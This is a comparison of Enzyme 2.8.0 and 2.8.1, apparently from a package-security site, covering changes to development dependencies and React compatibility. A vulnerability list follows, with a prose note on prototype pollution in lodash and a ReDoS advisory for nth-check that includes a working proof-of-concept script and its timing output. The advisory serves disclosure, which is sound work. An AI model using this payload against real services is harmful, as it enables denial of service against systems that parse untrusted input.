Enzyme 2.8.1 is a minor update to the popular JavaScript testing utility for React, building upon version 2.8.0. Both versions maintain the core functionality of simplifying React component testing by providing tools for shallow rendering, full DOM rendering, and static rendering. Key dependencies like cheerio, lodash, and prop-types remain consistent, ensuring compatibility with existing workflows.
However, subtle differences exist, primarily within the development dependencies. Version 2.8.1 incorporates newer versions of several Babel packages (babel-cli, babel-core, babel-eslint, babel-preset-airbnb, babel-register), lodash, eslint, eslint-plugin-react, and rimraf, potentially picking up bug fixes, performance improvements, or security patches in those tools. Notably, sinon is also updated, from 1.17.6 to 1.17.7. While these changes do not directly affect Enzyme's API or core functionality, they contribute to a more stable and up-to-date development environment for contributors and users who rely on these tools in their testing pipelines.
Choosing between 2.8.0 and 2.8.1 depends primarily on the developer's comfort level with updating development dependencies. If a project already utilizes a similar stack of Babel, ESLint, and other tools, upgrading to 2.8.1 might be beneficial to leverage the latest improvements. Conversely, if stability and minimal changes are preferred, sticking with 2.8.0 remains a viable option as the core Enzyme functionalities are practically identical, and React compatibility is ensured by the peerDependencies specification, which supports React versions 0.13.x, 0.14.x, and ^15.0.0-0 up to 15.x.
All vulnerabilities related to version 2.8.1 of the package
Inefficient Regular Expression Complexity in nth-check
There is a Regular Expression Denial of Service (ReDoS) vulnerability in nth-check that causes a denial of service when parsing crafted invalid CSS nth-checks.
The ReDoS weakness of the regex is mainly due to the sub-pattern \s*(?:([+-]?)\s*(\d+))? , in which two quantified \s* groups sit adjacent to each other and overlap, so a failing match is retried once for every way of splitting the whitespace between them. It can be triggered with the following code.
Proof of Concept
// PoC.js
var nthCheck = require("nth-check");
for (var i = 1; i <= 50000; i++) {
    var time = Date.now();
    // "2n", then i*10000 spaces, then a trailing "!" that guarantees the match fails
    var attack_str = "2n" + " ".repeat(i * 10000) + "!";
    try {
        nthCheck.parse(attack_str);
    } catch (err) {
        // parse() does reject the string, but only after backtracking over every whitespace split
        var time_cost = Date.now() - time;
        console.log("attack_str.length: " + attack_str.length + ": " + time_cost + " ms");
    }
}
The Output
attack_str.length: 10003: 174 ms
attack_str.length: 20003: 1427 ms
attack_str.length: 30003: 2602 ms
attack_str.length: 40003: 4378 ms
attack_str.length: 50003: 7473 ms
Prototype Pollution in lodash
Versions of lodash prior to 4.17.19 are vulnerable to Prototype Pollution. The functions pick, set, setWith, update, updateWith, and zipObjectDeep allow a malicious user to modify the prototype of Object if the property identifiers are user-supplied. Being affected by this issue requires manipulating objects based on user-provided property values or arrays.
This vulnerability causes the addition or modification of an existing property that will exist on all objects and may lead to Denial of Service or Code Execution under specific circumstances.